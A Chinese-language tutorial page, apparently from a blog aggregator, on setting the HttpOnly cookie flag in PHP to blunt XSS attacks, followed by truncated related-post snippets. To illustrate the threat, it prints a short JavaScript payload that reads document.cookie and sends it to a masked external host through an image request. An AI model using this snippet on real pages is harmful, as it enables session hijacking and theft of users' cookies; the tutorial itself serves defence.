2. 程式人生 > >利用HttpOnly來防禦xss攻擊

利用HttpOnly來防禦xss攻擊

阿新 發佈:2019-02-19

xss的概念就不用多說了,它的危害是極大的,這就意味著一旦你的網站出現xss漏洞,就可以執行任意的js程式碼,最可怕的是攻擊者利用js獲取cookie或者session劫持,如果這裡麵包含了大量敏感資訊(身份資訊,管理員資訊)等,那完了。。。

如下js獲取cookie資訊:

     url=document.top.location.href;
     cookie=document.cookie;
     c=new Image();
     c.src=’http://www.******.com/c.php?c=’+cookie+’&u=’+url;


一般cookie都是從document物件中獲取的,現在瀏覽器在設定Cookie的時候一般都接受一個叫做HttpOnly的引數,跟domain等其他引數一樣,一旦這個HttpOnly被設定,你在瀏覽器的document物件中就看不到Cookie了。
PHP設定HttpOnly:
  1. //在php.ini中,session.cookie_httponly = ture 來開啟全域性的Cookie的HttpOnly屬性
  2. ini_set("session.cookie_httponly",1);
  3. //或者setcookie()的第七個引數設定為true
  4. session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

對於PHP5.1以前版本的PHP通過:
  1. header("Set-Cookie: hidden=value; httpOnly");

最後,HttpOnly不是萬能的!

相關推薦

利用HttpOnly防禦xss攻擊

xss的概念就不用多說了,它的危害是極大的,這就意味著一旦你的網站出現xss漏洞,就可以執行任意的js程式碼,最可怕的是攻擊者利用js獲取cookie或者session劫持,如果這裡麵包含了大量敏感資訊(身份資訊,管理員資訊)等,那完了。。。 如下js獲取cookie資訊:

springboot 防禦XSS 攻擊的簡單實現

import javax.servlet.*; import javax.servlet.annotation.WebFilter; import javax.servlet.http.HttpServletRequest; import java.io.IOExceptio

Java中使用AntiSamy開源專案防禦XSS攻擊

背景:     之前公司有接了一個國土的專案,雖然是內部小專案,但是可能是zhengfu專案竟然找軟體測試公司大概測了一下。。。然後出現了以下三種問題:sql注入,XSS攻擊,介面訪問頻率。下面是解決XSS攻擊。 研究:     一開始的想法是,弄個過濾器把那些關鍵字過

防禦XSS攻擊:基於白名單的富文字XSS後端過濾(jsoup)

簡介: 跨站指令碼攻擊(Cross Site Scripting),為了不和層疊樣式表(Cascading Style Sheets, CSS)的縮寫混淆,故將跨站指令碼攻擊縮寫為XSS。  攻擊原

WEB網站防禦XSS攻擊思路和XSS實踐

本文將會著重介紹防禦XSS攻擊的一些原則,需要讀者對於XSS有所瞭解,至少知道XSS漏洞的基本原理,如果您對此不是特別清楚,請參考這兩篇文章:《Stored and Reflected XSS Attack》《DOM Based XSS》 攻擊者可以利用XSS漏洞向用戶傳送攻擊指令碼,而使用者的瀏

如何發起、防禦和測試XSS攻擊,我們用DVWA學習(下)

上一篇我們瞭解了XSS攻擊的原理,並且利用DVWA嘗試了簡單的XSS攻擊,這一篇我們來實現更復雜的攻擊,然後探討防禦機制和測試理念。   前面我們通過指令碼注入讓網頁彈出了使用者cookie資訊,可以光彈窗是沒有什麼用的,接下來我們想辦法把這些資訊傳送出去。   2.1 使用反射型

xss攻擊防禦

font 引號 span java 額外 有意義 tab 有意 script 除了在引號中分割單詞和強制結束語句外,額外的空格沒有意義。 >>>>>>java script : alert 同理 換行符/tab

從分析攻擊方式談如何防禦DDoS攻擊

DDoS攻擊 DDoS防禦 DDoS攻擊的定義:DDoS攻擊全稱——分布式拒絕服務攻擊,是網絡攻擊中非常常見的攻擊方式。在進行攻擊的時候,這種方式可以對不同地點的大量計算機進行攻擊,進行攻擊的時候主要是對攻擊的目標發送超過其處理能力的數據包,使攻擊目標出現癱瘓的情況,不能提供正常的服務。 DDoS攻擊

Web 攻擊XSS 攻擊防禦策略

XSS 攻擊 介紹 XSS 攻擊,從最初 netscap 推出 javascript 時,就已經察覺到了危險。 我們常常需要面臨跨域的解決方案,其實同源策略是保護我們的網站。糟糕的跨域會帶來危險,雖然我們做了訪問控制,但是網站仍然面臨著嚴峻的 XSS 攻擊考驗。 攻擊定義: Cross-Site

CSRF,XSS攻擊防禦

 CSRF概念:CSRF跨站點請求偽造(Cross—Site Request Forgery),跟XSS攻擊一樣,存在巨大的危害性,你可以這樣來理解:        攻擊者盜用了你的身份,以你的名義傳送惡意請求,對伺服器來說這個請求是完全合法的,

XSS攻擊防禦

XSS又稱CSS,全稱Cross SiteScript,跨站指令碼攻擊,是Web程式中常見的漏洞,XSS屬於被動式且用於客戶端的攻擊方式,所以容易被忽略其危害性。其原理是攻擊者向有XSS漏洞的網站中輸入(傳入)惡意的HTML程式碼,當其它使用者瀏覽該網站時,這段HTML程

php XSS攻擊原理與防禦

資料安全是軟體設計中要考慮的問題,在程式中保持資料的安全,除了保證程式碼內部執行的可靠,最主要就是嚴格控制外部資料,秉持一切使用者輸入的都是不可靠的原則,做好資料的驗證和過濾. PHP最簡單的過濾機制就是轉義,對使用者的輸入和輸出進行轉義和過濾. 我們先搞一

XSS攻擊防禦方法

一.什麼是XSS攻擊 跨站指令碼攻擊(Cross Site Scripting); 一種經常出現在web應用中的電腦保安漏洞; 它允許惡意web使用者將程式碼植入到提供給其它使用者使用的頁面中; 【可簡單理解為:在web頁面的不完善的輸入框中植入非法程式碼,從而達到盜取網站資訊、刪除快取等目的】 二.X

springMVC利用過濾器防止xss攻擊

轉載地址http://blog.csdn.net/catoop/article/details/50338259 一、什麼是XSS攻擊  XSS是一種經常出現在web應用中的電腦保安漏洞,它允許惡意web使用者將程式碼植入到提供給其它使用者使用的頁面中。比如這些程式碼包

前端攻防篇-XSS攻擊防禦

 本文來自:高爽|Coder,原文地址:http://blog.csdn.net/ghsau/article/details/17027893,轉載請註明。        XSS又稱CSS,全稱Cross SiteScript,跨站指令碼攻擊,是Web程式中常見的漏洞,X

Web前端安全——XSS攻擊防禦

跨站指令碼攻擊簡稱 XSS (Cross-Site Scriptting),是一種經常出現在web應用中的電腦保安漏洞,它允許惡意web使用者將程式碼植入到提供給其它使用者使用的頁面中。 XSS攻擊的危害: 1、盜取各類使用者帳號許可權(控制所盜竊許可權資料

WEB安全實戰(三)XSS 攻擊防禦

方案二 第二種方案也是藉助外力,主要是加入一個第三方的 jar 包,然後使用第三方元件給提供的 api,我們通過呼叫這些 api 可以避免 XSS 攻擊帶來的危險。具體步驟如下。 首先,新增第三方的元件包,commons-lang-2.5.jar,可以手動下載,也可以使用 maven 配置依賴,管理 j

XSS 攻擊實驗 & 防禦方案

XSS 攻擊&防禦實驗 不要覺得你的網站很安全,實際上每個網站或多或少都存在漏洞,其中xss/csrf是最常見的漏洞,也是最容易被開發者忽略的漏洞,一不小心就要被黑 下面以一個使用者列表頁面來演示xss攻擊的實驗 假設某個惡意使用

IIS7下php運行環境的搭建(巧妙利用phpmanger搭建php)

msvc png 環境 php5.6 eight php .dll 新的 過程   最近在window server2008上開發php項目,web服務器就用了win上內置的IIS服務器來搭建,可是一路坑,搭了幾次都不成功。翻閱網上資料,原來IIS 上可以利用phpmang

C#利用反射判斷對象是否包含某個屬性的實現方法

是否 npr nbsp pro bsp str return ram ret 本文實例展示了C#利用反射來判斷對象是否包含某個屬性的實現方法,對於C#程序設計人員來說有一定的學習借鑒價值。 具體實現代碼如下: 1 /// <summary> 2 /// 利